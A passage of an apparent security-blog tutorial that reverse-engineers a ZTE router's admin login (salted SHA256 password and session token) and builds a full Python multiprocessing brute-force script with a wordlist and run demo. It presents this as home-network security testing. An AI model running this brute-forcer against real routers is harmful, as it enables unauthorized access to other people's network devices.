\u003c/strong\u003eit's looks like this:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"960\" width=\"1280\" alt=\"router\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Fb2d09c587db6f6232c9bab6354f74ed0%2FRLvt-4u4G9M-RjbsNemqc?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eSo, let's take a look at the admin panel. Run command:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"bash language-bash\"\u003eip a\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"597\" width=\"1212\" alt=\"ip\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Ff7b650003f02479d710815fe0068332e%2FrRCaJhVNlUeIqKX7w8PID?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eGiven that my IP address is \u003ccode\u003e192.168.1.49\u003c/code\u003e, I'm willing to assume that the admin control panel is accessible at \u003ccode\u003ehttp://192.168.1.1\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"843\" width=\"1229\" alt=\"zte admin\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Ff84143727827a21a24a082624c7fa85b%2FtJQQbmLNRWLTcIfqc0aJz?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eLet's go to open Web Developer Tools at Firefox and try to login as \u003ccode\u003eadmin:admin\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"1037\" width=\"1057\" alt=\"1\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2F5fa23a2d3fa4e8c3695e08a811bf9910%2FxGcpuQr_PxG-zc8XesIUG?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"695\" width=\"1053\" alt=\"2\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2F59bdf7b62a7939dfd9dd6243d4594b57%2FqJruJqeRchXY_wIQZExH8?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eWe got at error as expected, since password is wrong.\u003c/p\u003e\n\u003cp\u003eLet's look at the login logic:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"257\" width=\"1580\" alt=\"3\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2F4a23ed8b0f12e9ea5071ced58e42bbc7%2F3dft3MuvTOtDEURmjei2U?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eAs you can see, in addition to username (\u003ccode\u003eUsername\u003c/code\u003e) and password (\u003ccode\u003ePassword\u003c/code\u003e) parameters, we have parameters action (\u003ccode\u003eaction=login\u003c/code\u003e) and session token (\u003ccode\u003e_sessionToken=906996931857070055384853\u003c/code\u003e). and the password is transmitted as a hash.\u003c/p\u003e\n\u003cp\u003eIf we open inspector we can see javascript functions, even login function:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"502\" width=\"1255\" alt=\"js\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Fc8a9010aafb075f7aa10b841935f0840%2FrSxJqAPEoMf5mPNY2Bvbt?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"333\" width=\"920\" alt=\"loginfunc\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Fa81bb380ec437cf519a8654c54b5b850%2FpX0UhKvv2GUjkctKLg93a?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eAs you can see:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"js language-js\"\u003evar SHA256Password = sha256(Password + xmlObj);\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eand:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"js language-js\"\u003eLoginFormObj.addParameter(\"_sessionTOKEN\", \"277758823860570164419205\");\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eAnd when we click login button:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"175\" width=\"1127\" alt=\"login\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Fa01abee9f30a0813630432961511e487%2Fd6vZaPJ2-UCcrSp4fhI_9?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eI made a couple of requests to the address specified in the function:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"bash language-bash\"\u003ecurl -XGET http://192.168.1.1/function_module/login_module/login_page/logintoken_lua.lua\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"273\" width=\"1255\" alt=\"logintokenlua\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Fe839f5e33b850bf7cd4038dc0a4d8295%2FMNMYWEigREnOGoXkEp9rD?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eAs you can see, some parameter comes in response and I assumed that when logging in, instead of an open password, it sends SHA256 of \u003ccode\u003epassword\u003c/code\u003e + this parameter. So, our python function to login is something like this:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003eimport requests\n\ndef login(username, pswd):\n    url = \"http://192.168.1.1\"\n    headers = {\"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"}\n    s = requests.Session()\n    r = s.get(url, headers = headers)\n    if r.ok:\n        page = r.text\n        token_idx = page.find('addParameter(\"_sessionTOKEN\", \"')\n        token = r.text[token_idx+31:token_idx + 55]\n\n        params = {\n            \"Username\" : username,\n            \"Password\" : pswd,\n            \"action\" : \"login\",\n            \"_sessionTOKEN\" : token,\n        }\n\n        s.post(url, headers = headers, data = params)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003ebut we have to send the hash of password with \"salt\" instead of password.\u003c/p\u003e\n\u003cp\u003eLet's request an \u003ccode\u003exml\u003c/code\u003e parameter:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003eimport re\n\ndef get_xml_param():\n    url = \"http://192.168.1.1/function_module/login_module/login_page/logintoken_lua.lua\"\n    headers = {\"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"}\n    r = requests.get(url, headers = headers)\n    if r.ok:\n        xml = re.sub('[^0-9,]', \"\", r.text)\n        return xml\n    return None\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThen create function for hashing our params:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003eimport hashlib\n\ndef passwd_to_sha256(pswd, xml):\n    h = hashlib.sha256(f\"{pswd}{xml}\".encode('utf-8')).hexdigest()\n    return h\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eSo we need to update our login function:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003edef login(username, pswd):\n    url = \"http://192.168.1.1\"\n    headers = {\"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"}\n    s = requests.Session()\n    r = s.get(url, headers = headers)\n    if r.ok:\n        page = r.text\n        token_idx = page.find('addParameter(\"_sessionTOKEN\", \"')\n        token = r.text[token_idx+31:token_idx + 55]\n\n        xml = get_xml_param()\n        pswd = passwd_to_sha256(pswd, xml)\n\n        params = {\n            \"Username\" : username,\n            \"Password\" : pswd,\n            \"action\" : \"login\",\n            \"_sessionTOKEN\" : token,\n        }\n\n        s.post(url, headers = headers, data = params)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eSo, our final version of the login script is something like this:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003eimport requests\nimport re\nimport hashlib\nimport lxml.html\n\ndef login(username, pswd):\n    url = \"http://192.168.1.1\"\n    headers = {\"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"}\n    s = requests.Session()\n    r = s.get(url, headers = headers)\n    if r.ok:\n        page = r.text\n        token_idx = page.find('addParameter(\"_sessionTOKEN\", \"')\n        token = r.text[token_idx+31:token_idx + 55]\n\n        xml = get_xml_param()\n        hashpswd = passwd_to_sha256(pswd, xml)\n\n        params = {\n            \"Username\" : username,\n            \"Password\" : hashpswd,\n            \"action\" : \"login\",\n            \"_sessionTOKEN\" : token,\n        }\n\n        r = s.post(url, headers = headers, data = params)\n        if r.ok:\n            tree = lxml.html.fromstring(r.text)\n            user_info = tree.xpath(\".//div[contains(@id, 'logUser')]/@title\")\n            if user_info[0]:\n                print (f\"{username}:{pswd} successfully login, hacked :)\")\n            else:\n                print (f\"{username}:{pswd} - login failed :(\")\n\ndef get_xml_param():\n    url = \"http://192.168.1.1/function_module/login_module/login_page/logintoken_lua.lua\"\n    headers = {\"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"}\n    r = requests.get(url, headers = headers)\n    if r.ok:\n        xml = re.sub('[^0-9,]', \"\", r.text)\n        return xml\n    return None\n\ndef passwd_to_sha256(pswd, xml):\n    h = hashlib.sha256(f\"{pswd}{xml}\".encode('utf-8')).hexdigest()\n    return h\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eNow let's add some brute force logic. Let's say we have wordlist file and we want to brute ZTE admin panel. So we will add another function:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003edef brute(username, wordlist):\n    pool = mp.Pool(4)\n    jobs = []\n    with open(wordlist) as fp:\n        for pswd in fp:\n            jobs.append(pool.apply_async(login, (username, pswd)))\n    for job in jobs:\n        job.get()\n    pool.close()\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eOk, but there is one more caveat:\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"761\" width=\"1031\" alt=\"wait\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2Fc5df487a324e88ebc2656d6e82d9c1a4%2FVTbOzOA4BTmvZ0DY95Sow?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eSo, for the purity of experiment, I added a timeout:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003etime.sleep(240)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eSo the full source code is:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"python language-python\"\u003eimport requests\nimport re\nimport hashlib\nimport argparse\nimport lxml.html\nimport time\nimport multiprocessing as mp\n\nclass Colors:\n    HEADER = '\\033[95m'\n    BLUE = '\\033[94m'\n    GREEN = '\\033[92m'\n    YELLOW = '\\033[93m'\n    RED = '\\033[91m'\n    PURPLE = '\\033[95m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\ndef login(username, pswd):\n    url = \"http://192.168.1.1\"\n    headers = {\n        'Accept' : '*/*',\n        'Accept-Language' : \"en-US,en;q=0.5\",\n        'Cache-Control' : 'max-age=0',\n        'Connection' : 'keep-alive',\n        \"Host\" : '192.168.1.1',\n        \"Referer\" : url, \n        \"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"\n    }\n    s = requests.Session()\n    r = s.get(url, headers = headers)\n    if r.ok:\n        page = r.text\n        token_idx = page.find('addParameter(\"_sessionTOKEN\", \"')\n        token = r.text[token_idx+31:token_idx + 55]\n\n        xml = get_xml_param()\n        hashpswd = passwd_to_sha256(pswd, xml)\n\n        params = {\n            \"Username\" : username,\n            \"Password\" : hashpswd,\n            \"action\" : \"login\",\n            \"_sessionTOKEN\" : token,\n        }\n\n        r = s.post(url, headers = headers, data = params)\n        if r.ok:\n            with open(\"test.html\", \"w\") as t:\n                t.write(r.text)\n            tree = lxml.html.fromstring(r.text)\n            user_info = tree.xpath(\".//div[contains(@id, 'logUser')]/@title\")\n            if user_info[0]:\n                print (Colors.GREEN + f\"{username}:{pswd} successfully login, hacked :)\" + Colors.ENDC)\n            else:\n                print (Colors.RED + f\"{username}:{pswd} - login failed :(\" + Colors.ENDC)\n    time.sleep(200)\n\ndef get_xml_param():\n    url = \"http://192.168.1.1/function_module/login_module/login_page/logintoken_lua.lua\"\n    headers = {\"User-Agent\" : \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\"}\n    r = requests.get(url, headers = headers)\n    if r.ok:\n        xml = re.sub('[^0-9,]', \"\", r.text)\n        return xml\n    return None\n\ndef passwd_to_sha256(pswd, xml):\n    h = hashlib.sha256(f\"{pswd}{xml}\".encode('utf-8')).hexdigest()\n    return h\n\ndef brute(username, wordlist):\n    print (Colors.BLUE + \"start brute...\" + Colors.ENDC)\n    pool = mp.Pool(4)\n    jobs = []\n    with open(wordlist) as fp:\n        for pswd in fp:\n            jobs.append(pool.apply_async(login, (username, pswd.replace(\"\\n\", \"\").strip())))\n    for job in jobs:\n        job.get()\n    pool.close()\n    print (Colors.BLUE + \"finish brute...\" + Colors.ENDC)\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-u','--uname', required = True, help = \"username\", default = 'admin')\n    parser.add_argument('-w','--wordlist', required = True, help = \"wordlist file\")\n    args = vars(parser.parse_args())\n    brute(args['uname'], args['wordlist'])\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3 id=\"demo\"\u003edemo\u003c/h3\u003e\n\u003cp\u003eLet's go to see everything in action. First of all, create wordlist file:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"bash language-bash\"\u003eadmin\n12345\npassword\nRh8Rw838@1\npa$$w0rd\nqwerty\n12345678\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eFor simplicity it's a little file with my ZTE router's admin panel password. Run:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"bash language-bash\"\u003epython3 zte_hack.py -u admin -w ./wordlist.txt\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"244\" width=\"688\" alt=\"final\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2F81d0f2dc8da91e11210072bb322d03eb%2FaJu_FsKiQzwk5HuoRZ9ND?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg loading=\"lazy\" height=\"779\" width=\"1249\" alt=\"final2\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2F6b3c0f2e0955a0760c9404874b023b23%2FwkWweh1NujlPATz65I9Cc?alt=media\"\u003e\u003c/p\u003e\n\u003cp\u003eAs you can see, everything is work perfectly!\u003c/p\u003e\n\u003cp\u003eUndoubtedly, one could replicate this experiment across a myriad of router models, each potentially susceptible to brute force attacks or even more sophisticated vulnerabilities. The aim is to illustrate that with basic proficiency in Python scripting, one can develop a tool to assess the security of their home network devices. This serves to underscore the broader significance of proactive cybersecurity measures in safeguarding against potential threats and vulnerabilities in network infrastructure.\u003c/p\u003e\n\u003cp\u003eOf course, with real sophisticated attacks, it’s not enough just to hack the router, but you also need lateral movement and pivot to other internal networks and go on.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis is a practical case for educational purposes only.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eThanks for your time happy hacking and good bye!\u003cbr\u003e\u003cem\u003ePS. All drawings and screenshots are mine\u003c/em\u003e\u003c/p\u003e","summary":"Let's say that you are connected to a public Wi-Fi. How difficult is it to crack the password to the admin panel of the router?","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F636b67e3cc690ab343826d44%2F21611fd52db6b202101137dbf5d4c1b1%2FRouterExploit.png?alt=media","format":"html","published":true,"tags":["pentesting","red team","crawling","password cracking","bruteforce"],"locale_code":"en","user_id":"636b67e3cc690ab343826d44","dutchArticleId":null,"priority":1712918135334,"User":{"name":"Zhassulan Zhussupov","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F636b67e3cc690ab343826d44%2Ffe736a50a52001d54d4207278f634ad9%2FUcckju52HtkK-PsxuFmj-?alt=media","desc":"Cybersecurity enthusiast | Author | Speaker | CTF player | R\u0026D Engineer | Jiu-Jitsu Practicioner"},"DutchArticle":null}],"_superjson":{"values":{"posts.0.updatedAt":["Date"],"posts.0.createdAt":["Date"],"posts.0.DutchArticle.updatedAt":["Date"],"posts.0.DutchArticle.createdAt":["Date"],"posts.1.updatedAt":["Date"],"posts.1.createdAt":["Date"],"posts.1.DutchArticle.updatedAt":["Date"],"posts.1.DutchArticle.createdAt":["Date"],"posts.2.updatedAt":["Date"],"posts.2.createdAt":["Date"],"posts.2.DutchArticle.updatedAt":["Date"],"posts.2.DutchArticle.createdAt":["Date"],"posts.3.updatedAt":["Date"],"posts.3.createdAt":["Date"],"posts.4.updatedAt":["Date"],"posts.4.createdAt":["Date"]}}}},"page":"/","query":{},"buildId":"gOHPSKRJyHMWHYp1WTY-F","isFallback":false,"isExperimentalCompile":false,"gssp":true,"appGip":true,"locale":"nl","locales":["en","nl"],"defaultLocale":"nl","domainLocales":[{"domain":"websec.net","defaultLocale":"en"},{"domain":"websec.nl","defaultLocale":"nl"}],"scriptLoader":[]}</script><next-route-announcer><p aria-live="assertive" id="__next-route-announcer__" role="alert" style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;"></p></next-route-announcer></body></html>